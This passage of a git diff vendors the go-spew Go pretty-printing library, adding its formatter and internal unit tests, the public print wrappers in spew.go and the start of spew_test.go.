+	tic3 := indirCir3{&v3}
+	tic2.ps3 = &tic3
+	v3.ps2 = &tic2
+	pv3 := &v3
+	tic2Addr := fmt.Sprintf("%p", &tic2)
+	tic3Addr := fmt.Sprintf("%p", &tic3)
+	v3Addr := fmt.Sprintf("%p", pv3)
+	pv3Addr := fmt.Sprintf("%p", &pv3)
+	v3t := "spew_test.indirCir1"
+	v3t2 := "spew_test.indirCir2"
+	v3t3 := "spew_test.indirCir3"
+	v3s := "{<*>{<*>{<*>{<*><shown>}}}}"
+	v3s2 := "{<*>{<*>{<*><shown>}}}"
+	v3s3 := "{ps2:<*>(" + tic2Addr + "){ps3:<*>(" + tic3Addr + "){ps1:<*>(" +
+		v3Addr + "){ps2:<*>(" + tic2Addr + ")<shown>}}}}"
+	v3s4 := "{ps2:<*>(" + tic2Addr + "){ps3:<*>(" + tic3Addr + "){ps1:<*>(" +
+		v3Addr + ")<shown>}}}"
+	v3s5 := "{ps2:(*" + v3t2 + "){ps3:(*" + v3t3 + "){ps1:(*" + v3t +
+		"){ps2:(*" + v3t2 + ")<shown>}}}}"
+	v3s6 := "{ps2:(*" + v3t2 + "){ps3:(*" + v3t3 + "){ps1:(*" + v3t +
+		")<shown>}}}"
+	v3s7 := "{ps2:(*" + v3t2 + ")(" + tic2Addr + "){ps3:(*" + v3t3 + ")(" +
+		tic3Addr + "){ps1:(*" + v3t + ")(" + v3Addr + "){ps2:(*" + v3t2 +
+		")(" + tic2Addr + ")<shown>}}}}"
+	v3s8 := "{ps2:(*" + v3t2 + ")(" + tic2Addr + "){ps3:(*" + v3t3 + ")(" +
+		tic3Addr + "){ps1:(*" + v3t + ")(" + v3Addr + ")<shown>}}}"
+	addFormatterTest("%v", v3, v3s)
+	addFormatterTest("%v", pv3, "<*>"+v3s2)
+	addFormatterTest("%v", &pv3, "<**>"+v3s2)
+	addFormatterTest("%+v", v3, v3s3)
+	addFormatterTest("%+v", pv3, "<*>("+v3Addr+")"+v3s4)
+	addFormatterTest("%+v", &pv3, "<**>("+pv3Addr+"->"+v3Addr+")"+v3s4)
+	addFormatterTest("%#v", v3, "("+v3t+")"+v3s5)
+	addFormatterTest("%#v", pv3, "(*"+v3t+")"+v3s6)
+	addFormatterTest("%#v", &pv3, "(**"+v3t+")"+v3s6)
+	addFormatterTest("%#+v", v3, "("+v3t+")"+v3s7)
+	addFormatterTest("%#+v", pv3, "(*"+v3t+")("+v3Addr+")"+v3s8)
+	addFormatterTest("%#+v", &pv3, "(**"+v3t+")("+pv3Addr+"->"+v3Addr+")"+v3s8)
+}
+
+func addPanicFormatterTests() {
+	// Type that panics in its Stringer interface.
+	v := panicer(127)
+	nv := (*panicer)(nil)
+	pv := &v
+	vAddr := fmt.Sprintf("%p", pv)
+	pvAddr := fmt.Sprintf("%p", &pv)
+	vt := "spew_test.panicer"
+	vs := "(PANIC=test panic)127"
+	addFormatterTest("%v", v, vs)
+	addFormatterTest("%v", pv, "<*>"+vs)
+	addFormatterTest("%v", &pv, "<**>"+vs)
+	addFormatterTest("%v", nv, "<nil>")
+	addFormatterTest("%+v", v, vs)
+	addFormatterTest("%+v", pv, "<*>("+vAddr+")"+vs)
+	addFormatterTest("%+v", &pv, "<**>("+pvAddr+"->"+vAddr+")"+vs)
+	addFormatterTest("%+v", nv, "<nil>")
+	addFormatterTest("%#v", v, "("+vt+")"+vs)
+	addFormatterTest("%#v", pv, "(*"+vt+")"+vs)
+	addFormatterTest("%#v", &pv, "(**"+vt+")"+vs)
+	addFormatterTest("%#v", nv, "(*"+vt+")"+"<nil>")
+	addFormatterTest("%#+v", v, "("+vt+")"+vs)
+	addFormatterTest("%#+v", pv, "(*"+vt+")("+vAddr+")"+vs)
+	addFormatterTest("%#+v", &pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")"+vs)
+	addFormatterTest("%#+v", nv, "(*"+vt+")"+"<nil>")
+}
+
+func addErrorFormatterTests() {
+	// Type that has a custom Error interface.
+	v := customError(127)
+	nv := (*customError)(nil)
+	pv := &v
+	vAddr := fmt.Sprintf("%p", pv)
+	pvAddr := fmt.Sprintf("%p", &pv)
+	vt := "spew_test.customError"
+	vs := "error: 127"
+	addFormatterTest("%v", v, vs)
+	addFormatterTest("%v", pv, "<*>"+vs)
+	addFormatterTest("%v", &pv, "<**>"+vs)
+	addFormatterTest("%v", nv, "<nil>")
+	addFormatterTest("%+v", v, vs)
+	addFormatterTest("%+v", pv, "<*>("+vAddr+")"+vs)
+	addFormatterTest("%+v", &pv, "<**>("+pvAddr+"->"+vAddr+")"+vs)
+	addFormatterTest("%+v", nv, "<nil>")
+	addFormatterTest("%#v", v, "("+vt+")"+vs)
+	addFormatterTest("%#v", pv, "(*"+vt+")"+vs)
+	addFormatterTest("%#v", &pv, "(**"+vt+")"+vs)
+	addFormatterTest("%#v", nv, "(*"+vt+")"+"<nil>")
+	addFormatterTest("%#+v", v, "("+vt+")"+vs)
+	addFormatterTest("%#+v", pv, "(*"+vt+")("+vAddr+")"+vs)
+	addFormatterTest("%#+v", &pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")"+vs)
+	addFormatterTest("%#+v", nv, "(*"+vt+")"+"<nil>")
+}
+
+func addPassthroughFormatterTests() {
+	// %x passthrough with uint.
+	v := uint(4294967295)
+	pv := &v
+	vAddr := fmt.Sprintf("%x", pv)
+	pvAddr := fmt.Sprintf("%x", &pv)
+	vs := "ffffffff"
+	addFormatterTest("%x", v, vs)
+	addFormatterTest("%x", pv, vAddr)
+	addFormatterTest("%x", &pv, pvAddr)
+
+	// %#x passthrough with uint.
+	v2 := int(2147483647)
+	pv2 := &v2
+	v2Addr := fmt.Sprintf("%#x", pv2)
+	pv2Addr := fmt.Sprintf("%#x", &pv2)
+	v2s := "0x7fffffff"
+	addFormatterTest("%#x", v2, v2s)
+	addFormatterTest("%#x", pv2, v2Addr)
+	addFormatterTest("%#x", &pv2, pv2Addr)
+
+	// %f passthrough with precision.
+	addFormatterTest("%.2f", 3.1415, "3.14")
+	addFormatterTest("%.3f", 3.1415, "3.142")
+	addFormatterTest("%.4f", 3.1415, "3.1415")
+
+	// %f passthrough with width and precision.
+	addFormatterTest("%5.2f", 3.1415, " 3.14")
+	addFormatterTest("%6.3f", 3.1415, " 3.142")
+	addFormatterTest("%7.4f", 3.1415, " 3.1415")
+
+	// %d passthrough with width.
+	addFormatterTest("%3d", 127, "127")
+	addFormatterTest("%4d", 127, " 127")
+	addFormatterTest("%5d", 127, "  127")
+
+	// %q passthrough with string.
+	addFormatterTest("%q", "test", "\"test\"")
+}
+
+// TestFormatter executes all of the tests described by formatterTests.
+func TestFormatter(t *testing.T) {
+	// Setup tests.
+	addIntFormatterTests()
+	addUintFormatterTests()
+	addBoolFormatterTests()
+	addFloatFormatterTests()
+	addComplexFormatterTests()
+	addArrayFormatterTests()
+	addSliceFormatterTests()
+	addStringFormatterTests()
+	addInterfaceFormatterTests()
+	addMapFormatterTests()
+	addStructFormatterTests()
+	addUintptrFormatterTests()
+	addUnsafePointerFormatterTests()
+	addChanFormatterTests()
+	addFuncFormatterTests()
+	addCircularFormatterTests()
+	addPanicFormatterTests()
+	addErrorFormatterTests()
+	addPassthroughFormatterTests()
+
+	t.Logf("Running %d tests", len(formatterTests))
+	for i, test := range formatterTests {
+		buf := new(bytes.Buffer)
+		spew.Fprintf(buf, test.format, test.in)
+		s := buf.String()
+		if testFailed(s, test.wants) {
+			t.Errorf("Formatter #%d format: %s got: %s %s", i, test.format, s,
+				stringizeWants(test.wants))
+			continue
+		}
+	}
+}
+
+type testStruct struct {
+	x int
+}
+
+func (ts testStruct) String() string {
+	return fmt.Sprintf("ts.%d", ts.x)
+}
+
+type testStructP struct {
+	x int
+}
+
+func (ts *testStructP) String() string {
+	return fmt.Sprintf("ts.%d", ts.x)
+}
+
+func TestPrintSortedKeys(t *testing.T) {
+	cfg := spew.ConfigState{SortKeys: true}
+	s := cfg.Sprint(map[int]string{1: "1", 3: "3", 2: "2"})
+	expected := "map[1:1 2:2 3:3]"
+	if s != expected {
+		t.Errorf("Sorted keys mismatch 1:\n  %v %v", s, expected)
+	}
+
+	s = cfg.Sprint(map[stringer]int{"1": 1, "3": 3, "2": 2})
+	expected = "map[stringer 1:1 stringer 2:2 stringer 3:3]"
+	if s != expected {
+		t.Errorf("Sorted keys mismatch 2:\n  %v %v", s, expected)
+	}
+
+	s = cfg.Sprint(map[pstringer]int{pstringer("1"): 1, pstringer("3"): 3, pstringer("2"): 2})
+	expected = "map[stringer 1:1 stringer 2:2 stringer 3:3]"
+	if spew.UnsafeDisabled {
+		expected = "map[1:1 2:2 3:3]"
+	}
+	if s != expected {
+		t.Errorf("Sorted keys mismatch 3:\n  %v %v", s, expected)
+	}
+
+	s = cfg.Sprint(map[testStruct]int{testStruct{1}: 1, testStruct{3}: 3, testStruct{2}: 2})
+	expected = "map[ts.1:1 ts.2:2 ts.3:3]"
+	if s != expected {
+		t.Errorf("Sorted keys mismatch 4:\n  %v %v", s, expected)
+	}
+
+	if !spew.UnsafeDisabled {
+		s = cfg.Sprint(map[testStructP]int{testStructP{1}: 1, testStructP{3}: 3, testStructP{2}: 2})
+		expected = "map[ts.1:1 ts.2:2 ts.3:3]"
+		if s != expected {
+			t.Errorf("Sorted keys mismatch 5:\n  %v %v", s, expected)
+		}
+	}
+
+	s = cfg.Sprint(map[customError]int{customError(1): 1, customError(3): 3, customError(2): 2})
+	expected = "map[error: 1:1 error: 2:2 error: 3:3]"
+	if s != expected {
+		t.Errorf("Sorted keys mismatch 6:\n  %v %v", s, expected)
+	}
+}
diff --git a/vendor/github.com/davecgh/go-spew/spew/internal_test.go b/vendor/github.com/davecgh/go-spew/spew/internal_test.go
new file mode 100644
index 0000000000..20a9cfefc6
--- /dev/null
+++ b/vendor/github.com/davecgh/go-spew/spew/internal_test.go
@@ -0,0 +1,87 @@
+/*
+ * Copyright (c) 2013-2016 Dave Collins <dave@davec.name>
+ *
+ * Permission to use, copy, modify, and distribute this software for any
+ * purpose with or without fee is hereby granted, provided that the above
+ * copyright notice and this permission notice appear in all copies.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+ * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+ * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
+ * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+ * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
+ * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
+ * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
+ */
+
+/*
+This test file is part of the spew package rather than than the spew_test
+package because it needs access to internals to properly test certain cases
+which are not possible via the public interface since they should never happen.
+*/
+
+package spew
+
+import (
+	"bytes"
+	"reflect"
+	"testing"
+)
+
+// dummyFmtState implements a fake fmt.State to use for testing invalid
+// reflect.Value handling.  This is necessary because the fmt package catches
+// invalid values before invoking the formatter on them.
+type dummyFmtState struct {
+	bytes.Buffer
+}
+
+func (dfs *dummyFmtState) Flag(f int) bool {
+	if f == int('+') {
+		return true
+	}
+	return false
+}
+
+func (dfs *dummyFmtState) Precision() (int, bool) {
+	return 0, false
+}
+
+func (dfs *dummyFmtState) Width() (int, bool) {
+	return 0, false
+}
+
+// TestInvalidReflectValue ensures the dump and formatter code handles an
+// invalid reflect value properly.  This needs access to internal state since it
+// should never happen in real code and therefore can't be tested via the public
+// API.
+func TestInvalidReflectValue(t *testing.T) {
+	i := 1
+
+	// Dump invalid reflect value.
+	v := new(reflect.Value)
+	buf := new(bytes.Buffer)
+	d := dumpState{w: buf, cs: &Config}
+	d.dump(*v)
+	s := buf.String()
+	want := "<invalid>"
+	if s != want {
+		t.Errorf("InvalidReflectValue #%d\n got: %s want: %s", i, s, want)
+	}
+	i++
+
+	// Formatter invalid reflect value.
+	buf2 := new(dummyFmtState)
+	f := formatState{value: *v, cs: &Config, fs: buf2}
+	f.format(*v)
+	s = buf2.String()
+	want = "<invalid>"
+	if s != want {
+		t.Errorf("InvalidReflectValue #%d got: %s want: %s", i, s, want)
+	}
+}
+
+// SortValues makes the internal sortValues function available to the test
+// package.
+func SortValues(values []reflect.Value, cs *ConfigState) {
+	sortValues(values, cs)
+}
diff --git a/vendor/github.com/davecgh/go-spew/spew/internalunsafe_test.go b/vendor/github.com/davecgh/go-spew/spew/internalunsafe_test.go
new file mode 100644
index 0000000000..a0c612ec3d
--- /dev/null
+++ b/vendor/github.com/davecgh/go-spew/spew/internalunsafe_test.go
@@ -0,0 +1,102 @@
+// Copyright (c) 2013-2016 Dave Collins <dave@davec.name>
+
+// Permission to use, copy, modify, and distribute this software for any
+// purpose with or without fee is hereby granted, provided that the above
+// copyright notice and this permission notice appear in all copies.
+
+// THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+// WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+// MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
+// ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+// WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
+// ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
+// OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
+
+// NOTE: Due to the following build constraints, this file will only be compiled
+// when the code is not running on Google App Engine, compiled by GopherJS, and
+// "-tags safe" is not added to the go build command line.  The "disableunsafe"
+// tag is deprecated and thus should not be used.
+// +build !js,!appengine,!safe,!disableunsafe
+
+/*
+This test file is part of the spew package rather than than the spew_test
+package because it needs access to internals to properly test certain cases
+which are not possible via the public interface since they should never happen.
+*/
+
+package spew
+
+import (
+	"bytes"
+	"reflect"
+	"testing"
+	"unsafe"
+)
+
+// changeKind uses unsafe to intentionally change the kind of a reflect.Value to
+// the maximum kind value which does not exist.  This is needed to test the
+// fallback code which punts to the standard fmt library for new types that
+// might get added to the language.
+func changeKind(v *reflect.Value, readOnly bool) {
+	rvf := (*uintptr)(unsafe.Pointer(uintptr(unsafe.Pointer(v)) + offsetFlag))
+	*rvf = *rvf | ((1<<flagKindWidth - 1) << flagKindShift)
+	if readOnly {
+		*rvf |= flagRO
+	} else {
+		*rvf &= ^uintptr(flagRO)
+	}
+}
+
+// TestAddedReflectValue tests functionaly of the dump and formatter code which
+// falls back to the standard fmt library for new types that might get added to
+// the language.
+func TestAddedReflectValue(t *testing.T) {
+	i := 1
+
+	// Dump using a reflect.Value that is exported.
+	v := reflect.ValueOf(int8(5))
+	changeKind(&v, false)
+	buf := new(bytes.Buffer)
+	d := dumpState{w: buf, cs: &Config}
+	d.dump(v)
+	s := buf.String()
+	want := "(int8) 5"
+	if s != want {
+		t.Errorf("TestAddedReflectValue #%d\n got: %s want: %s", i, s, want)
+	}
+	i++
+
+	// Dump using a reflect.Value that is not exported.
+	changeKind(&v, true)
+	buf.Reset()
+	d.dump(v)
+	s = buf.String()
+	want = "(int8) <int8 Value>"
+	if s != want {
+		t.Errorf("TestAddedReflectValue #%d\n got: %s want: %s", i, s, want)
+	}
+	i++
+
+	// Formatter using a reflect.Value that is exported.
+	changeKind(&v, false)
+	buf2 := new(dummyFmtState)
+	f := formatState{value: v, cs: &Config, fs: buf2}
+	f.format(v)
+	s = buf2.String()
+	want = "5"
+	if s != want {
+		t.Errorf("TestAddedReflectValue #%d got: %s want: %s", i, s, want)
+	}
+	i++
+
+	// Formatter using a reflect.Value that is not exported.
+	changeKind(&v, true)
+	buf2.Reset()
+	f = formatState{value: v, cs: &Config, fs: buf2}
+	f.format(v)
+	s = buf2.String()
+	want = "<int8 Value>"
+	if s != want {
+		t.Errorf("TestAddedReflectValue #%d got: %s want: %s", i, s, want)
+	}
+}
diff --git a/vendor/github.com/davecgh/go-spew/spew/spew.go b/vendor/github.com/davecgh/go-spew/spew/spew.go
new file mode 100644
index 0000000000..32c0e33882
--- /dev/null
+++ b/vendor/github.com/davecgh/go-spew/spew/spew.go
@@ -0,0 +1,148 @@
+/*
+ * Copyright (c) 2013-2016 Dave Collins <dave@davec.name>
+ *
+ * Permission to use, copy, modify, and distribute this software for any
+ * purpose with or without fee is hereby granted, provided that the above
+ * copyright notice and this permission notice appear in all copies.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+ * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+ * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
+ * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+ * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
+ * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
+ * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
+ */
+
+package spew
+
+import (
+	"fmt"
+	"io"
+)
+
+// Errorf is a wrapper for fmt.Errorf that treats each argument as if it were
+// passed with a default Formatter interface returned by NewFormatter.  It
+// returns the formatted string as a value that satisfies error.  See
+// NewFormatter for formatting details.
+//
+// This function is shorthand for the following syntax:
+//
+//	fmt.Errorf(format, spew.NewFormatter(a), spew.NewFormatter(b))
+func Errorf(format string, a ...interface{}) (err error) {
+	return fmt.Errorf(format, convertArgs(a)...)
+}
+
+// Fprint is a wrapper for fmt.Fprint that treats each argument as if it were
+// passed with a default Formatter interface returned by NewFormatter.  It
+// returns the number of bytes written and any write error encountered.  See
+// NewFormatter for formatting details.
+//
+// This function is shorthand for the following syntax:
+//
+//	fmt.Fprint(w, spew.NewFormatter(a), spew.NewFormatter(b))
+func Fprint(w io.Writer, a ...interface{}) (n int, err error) {
+	return fmt.Fprint(w, convertArgs(a)...)
+}
+
+// Fprintf is a wrapper for fmt.Fprintf that treats each argument as if it were
+// passed with a default Formatter interface returned by NewFormatter.  It
+// returns the number of bytes written and any write error encountered.  See
+// NewFormatter for formatting details.
+//
+// This function is shorthand for the following syntax:
+//
+//	fmt.Fprintf(w, format, spew.NewFormatter(a), spew.NewFormatter(b))
+func Fprintf(w io.Writer, format string, a ...interface{}) (n int, err error) {
+	return fmt.Fprintf(w, format, convertArgs(a)...)
+}
+
+// Fprintln is a wrapper for fmt.Fprintln that treats each argument as if it
+// passed with a default Formatter interface returned by NewFormatter.  See
+// NewFormatter for formatting details.
+//
+// This function is shorthand for the following syntax:
+//
+//	fmt.Fprintln(w, spew.NewFormatter(a), spew.NewFormatter(b))
+func Fprintln(w io.Writer, a ...interface{}) (n int, err error) {
+	return fmt.Fprintln(w, convertArgs(a)...)
+}
+
+// Print is a wrapper for fmt.Print that treats each argument as if it were
+// passed with a default Formatter interface returned by NewFormatter.  It
+// returns the number of bytes written and any write error encountered.  See
+// NewFormatter for formatting details.
+//
+// This function is shorthand for the following syntax:
+//
+//	fmt.Print(spew.NewFormatter(a), spew.NewFormatter(b))
+func Print(a ...interface{}) (n int, err error) {
+	return fmt.Print(convertArgs(a)...)
+}
+
+// Printf is a wrapper for fmt.Printf that treats each argument as if it were
+// passed with a default Formatter interface returned by NewFormatter.  It
+// returns the number of bytes written and any write error encountered.  See
+// NewFormatter for formatting details.
+//
+// This function is shorthand for the following syntax:
+//
+//	fmt.Printf(format, spew.NewFormatter(a), spew.NewFormatter(b))
+func Printf(format string, a ...interface{}) (n int, err error) {
+	return fmt.Printf(format, convertArgs(a)...)
+}
+
+// Println is a wrapper for fmt.Println that treats each argument as if it were
+// passed with a default Formatter interface returned by NewFormatter.  It
+// returns the number of bytes written and any write error encountered.  See
+// NewFormatter for formatting details.
+//
+// This function is shorthand for the following syntax:
+//
+//	fmt.Println(spew.NewFormatter(a), spew.NewFormatter(b))
+func Println(a ...interface{}) (n int, err error) {
+	return fmt.Println(convertArgs(a)...)
+}
+
+// Sprint is a wrapper for fmt.Sprint that treats each argument as if it were
+// passed with a default Formatter interface returned by NewFormatter.  It
+// returns the resulting string.  See NewFormatter for formatting details.
+//
+// This function is shorthand for the following syntax:
+//
+//	fmt.Sprint(spew.NewFormatter(a), spew.NewFormatter(b))
+func Sprint(a ...interface{}) string {
+	return fmt.Sprint(convertArgs(a)...)
+}
+
+// Sprintf is a wrapper for fmt.Sprintf that treats each argument as if it were
+// passed with a default Formatter interface returned by NewFormatter.  It
+// returns the resulting string.  See NewFormatter for formatting details.
+//
+// This function is shorthand for the following syntax:
+//
+//	fmt.Sprintf(format, spew.NewFormatter(a), spew.NewFormatter(b))
+func Sprintf(format string, a ...interface{}) string {
+	return fmt.Sprintf(format, convertArgs(a)...)
+}
+
+// Sprintln is a wrapper for fmt.Sprintln that treats each argument as if it
+// were passed with a default Formatter interface returned by NewFormatter.  It
+// returns the resulting string.  See NewFormatter for formatting details.
+//
+// This function is shorthand for the following syntax:
+//
+//	fmt.Sprintln(spew.NewFormatter(a), spew.NewFormatter(b))
+func Sprintln(a ...interface{}) string {
+	return fmt.Sprintln(convertArgs(a)...)
+}
+
+// convertArgs accepts a slice of arguments and returns a slice of the same
+// length with each argument converted to a default spew Formatter interface.
+func convertArgs(args []interface{}) (formatters []interface{}) {
+	formatters = make([]interface{}, len(args))
+	for index, arg := range args {
+		formatters[index] = NewFormatter(arg)
+	}
+	return formatters
+}
diff --git a/vendor/github.com/davecgh/go-spew/spew/spew_test.go b/vendor/github.com/davecgh/go-spew/spew/spew_test.go
new file mode 100644
index 0000000000..b70466c69f
--- /dev/null
+++ b/vendor/github.com/davecgh/go-spew/spew/spew_test.go
@@ -0,0 +1,320 @@
+/*
+ * Copyright (c) 2013-2016 Dave Collins <dave@davec.name>
+ *
+ * Permission to use, copy, modify, and distribute this software for any
+ * purpose with or without fee is hereby granted, provided that the above
+ * copyright notice and this permission notice appear in all copies.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+ * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+ * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
+ * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+ * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
+ * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
+ * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
+ */
+
+package spew_test
+
+import (
+	"bytes"
+	"fmt"
+	"io/ioutil"
+	"os"
+	"testing"
+
+	"github.com/davecgh/go-spew/spew"
+)
+
+// spewFunc is used to identify which public function of the spew package or
+// ConfigState a test applies to.
+type spewFunc int
+
+const (
+	fCSFdump spewFunc = iota
+	fCSFprint
+	fCSFprintf
+	fCSFprintln
+	fCSPrint
+	fCSPrintln
+	fCSSdump
+	fCSSprint
+	fCSSprintf
+	fCSSprintln
+	fCSErrorf
+	fCSNewFormatter
+	fErrorf
+	fFprint
+	fFprintln
+	fPrint
+	fPrintln
+	fSdump
+	fSprint
+	fSprintf
+	fSprintln
+)
+
+// Map of spewFunc values to names for pretty printing.
+var spewFuncStrings = map[spewFunc]string{
+	fCSFdump:        "ConfigState.Fdump",
+	fCSFprint:       "ConfigState.Fprint",
+	fCSFprintf:      "ConfigState.Fprintf",
+	fCSFprintln:     "ConfigState.Fprintln",
+	fCSSdump:        "ConfigState.Sdump",
+	fCSPrint:        "ConfigState.Print",
+	fCSPrintln:      "ConfigState.Println",
+	fCSSprint:       "ConfigState.Sprint",
+	fCSSprintf:      "ConfigState.Sprintf",
+	fCSSprintln:     "ConfigState.Sprintln",
+	fCSErrorf:       "ConfigState.Errorf",
+	fCSNewFormatter: "ConfigState.NewFormatter",
+	fErrorf:         "spew.Errorf",
+	fFprint:         "spew.Fprint",
+	fFprintln:       "spew.Fprintln",
+	fPrint:          "spew.Print",
+	fPrintln:        "spew.Println",
+	fSdump:          "spew.Sdump",
+	fSprint:         "spew.Sprint",
+	fSprintf:        "spew.Sprintf",
+	fSprintln:       "spew.Sprintln",
+}
+
+func (f spewFunc) String() string {
+	if s, ok := spewFuncStrings[f]; ok {
+		return s
+	}
+	return fmt.Sprintf("Unknown spewFunc (%d)", int(f))
+}
+
+// spewTest is used to describe a test to be performed against the public
+// functions of the spew package or ConfigState.
+type spewTest struct {
+	cs     *spew.ConfigState
+	f      spewFunc
+	format string
+	in     interface{}
+	want   string
+}
+
+// spewTests houses the tests to be performed against the public functions of
+// the spew package and ConfigState.
+//
+// These tests are only intended to ensure the public functions are exercised
+// and are intentionally not exhaustive of types.  The exhaustive type
+// tests are handled in the dump and format tests.
+var spewTests []spewTest
+
+// redirStdout is a helper function to return the standard output from f as a
+// byte slice.
+func redirStdout(f func()) ([]byte, error) {
+	tempFile, err := ioutil.TempFile("", "ss-test")
+	if err != nil {
+		return nil, err
+	}
+	fileName := tempFile.Name()
+	defer os.Remove(fileName) // Ignore error
+
+	origStdout := os.Stdout
+	os.Stdout = tempFile
+	f()
+	os.Stdout = origStdout
+	tempFile.Close()
+
+	return ioutil.ReadFile(fileName)
+}
+
+func initSpewTests() {
+	// Config states with various settings.
+	scsDefault := spew.NewDefaultConfig()
+	scsNoMethods := &spew.ConfigState{Indent: " ", DisableMethods: true}
+	scsNoPmethods := &spew.ConfigState{Indent: " ", DisablePointerMethods: true}
+	scsMaxDepth := &spew.ConfigState{Indent: " ", MaxDepth: 1}
+	scsContinue := &spew.ConfigState{Indent: " ", ContinueOnMethod: true}
+	scsNoPtrAddr := &spew.ConfigState{DisablePointerAddresses: true}
+	scsNoCap := &spew.ConfigState{DisableCapacities: true}
+
+	// Variables for tests on types which implement Stringer interface with and
+	// without a pointer receiver.
+	ts := stringer("test")
+	tps := pstringer("test")
+
+	type ptrTester struct {
+		s *struct{}
+	}
+	tptr := &ptrTester{s: &struct{}{}}
+
+	// depthTester is used to test max depth handling for structs, array, slices
+	// and maps.
+	type depthTester struct {
+		ic    indirCir1
+		arr   [1]string
+		slice []string
+		m     map[string]int
+	}
+	dt := depthTester{indirCir1{nil}, [1]string{"arr"}, []string{"slice"},
+		map[string]int{"one": 1}}
+
+	// Variable for tests on types which implement error interface.
+	te := customError(10)
+
+	spewTests = []spewTest{
+		{scsDefault, fCSFdump, "", int8(127), "(int8) 127\n"},
+		{scsDefault, fCSFprint, "", int16(32767), "32767"},
+		{scsDefault, fCSFprintf, "%v", int32(2147483647), "2147483647"},
+		{scsDefault, fCSFprintln, "", int(2147483647), "2147483647\n"},
+		{scsDefault, fCSPrint, "", int64(9223372036854775807), "9223372036854775807"},
+		{scsDefault, fCSPrintln, "", uint8(255), "255\n"},
+		{scsDefault, fCSSdump, "", uint8(64), "(uint8) 64\n"},
+		{scsDefault, fCSSprint, "", complex(1, 2), "(1+2i)"},
+		{scsDefault, fCSSprintf, "%v", complex(float32(3), 4), "(3+4i)"},
+		{scsDefault, fCSSprintln, "", complex(float64(5), 6), "(5+6i)\n"},
+		{scsDefault, fCSErrorf, "%#v", uint16(65535), "(uint16)65535"},
+		{scsDefault, fCSNewFormatter, "%v", uint32(4294967295), "4294967295"},
+		{scsDefault, fErrorf, "%v", uint64(18446744073709551615), "18446744073709551615"},
+		{scsDefault, fFprint, "", float32(3.14), "3.14"},
+		{scsDefault, fFprintln, "", float64(6.28), "6.28\n"},
+		{scsDefault, fPrint, "", true, "true"},
+		{scsDefault, fPrintln, "", false, "false\n"},
+		{scsDefault, fSdump, "", complex(-10, -20), "(complex128) (-10-20i)\n"},
+		{scsDefault, fSprint, "", complex(-1, -2), "(-1-2i)"},
+		{scsDefault, fSprintf, "%v", complex(float32(-3), -4), "(-3-4i)"},
+		{scsDefault, fSprintln, "", complex(float64(-5), -6), "(-5-6i)\n"},
+		{scsNoMethods, fCSFprint, "", ts, "test"},
+		{scsNoMethods, fCSFprint, "", &ts, "<*>test"},
+		{scsNoMethods, fCSFprint, "", tps, "test"},
+		{scsNoMethods, fCSFprint, "", &tps, "<*>test"},
+		{scsNoPmethods, fCSFprint, "", ts, "stringer test"},
+		{scsNoPmethods, fCSFprint, "", &ts, "<*>stringer test"},
+		{scsNoPmethods, fCSFprint, "", tps, "test"},
+		{scsNoPmethods, fCSFprint, "", &tps, "<*>stringer test"},
+		{scsMaxDepth, fCSFprint, "", dt, "{{<max>} [<max>] [<max>] map[<max>]}"},
+		{scsMaxDepth, fCSFdump, "", dt, "(spew_test.depthTester) {\n" +
+			" ic: (spew_test.indirCir1) {\n  <max depth reached>\n },\n" +
+			" arr: ([1]string) (len=1 cap=1) {\n  <max depth reached>\n },\n" +
+			" slice: ([]string) (len=1 cap=1) {\n  <max depth reached>\n },\n" +
+			" m: (map[string]int) (len=1) {\n  <max depth reached>\n }\n}\n"},
+		{scsContinue, fCSFprint, "", ts, "(stringer test) test"},
+		{scsContinue, fCSFdump, "", ts, "(spew_test.stringer) " +
+			"(len=4) (stringer test) \"test\"\n"},
+		{scsContinue, fCSFprint, "", te, "(error: 10) 10"},
+		{scsContinue, fCSFdump, "", te, "(spew_test.customError) " +
+			"(error: 10) 10\n"},
+		{scsNoPtrAddr, fCSFprint, "", tptr, "<*>{<*>{}}"},
